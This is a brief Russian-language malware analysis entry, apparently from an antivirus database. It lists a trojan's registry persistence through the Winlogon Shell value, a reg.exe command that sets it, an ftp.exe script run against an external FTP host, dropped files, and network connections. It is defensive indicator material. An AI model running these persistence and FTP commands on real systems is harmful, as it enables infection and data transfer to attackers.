Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe <SYSTEM32>\nukeh.exe'
- <SYSTEM32>\ftp.exe -s:%WINDIR%\transfer.txt ftp.webcindario.com
- <SYSTEM32>\reg.exe add hklm\software\microsoft\windows" "NT\currentversion\winlogon /v Shell /t REG_SZ /d explorer.exe" "<SYSTEM32>\nukeh.exe /f
- %WINDIR%\explorer.exe <Текущая директория><Имя вируса>
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\nuke[1].htm
- %WINDIR%\transfer.txt
- <SYSTEM32>\nukeh.exe
- 'ft#.##bcindario.com':21
- 'localhost':1040
- 'localhost':1035
- 'mx.###cities.com':80
- mx.###cities.com/vampiro_caifanes/nuke.htm
- DNS ASK ft#.##bcindario.com
- DNS ASK mx.###cities.com
- '10.#.1.1':1037
- '10.#.1.1':1036
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''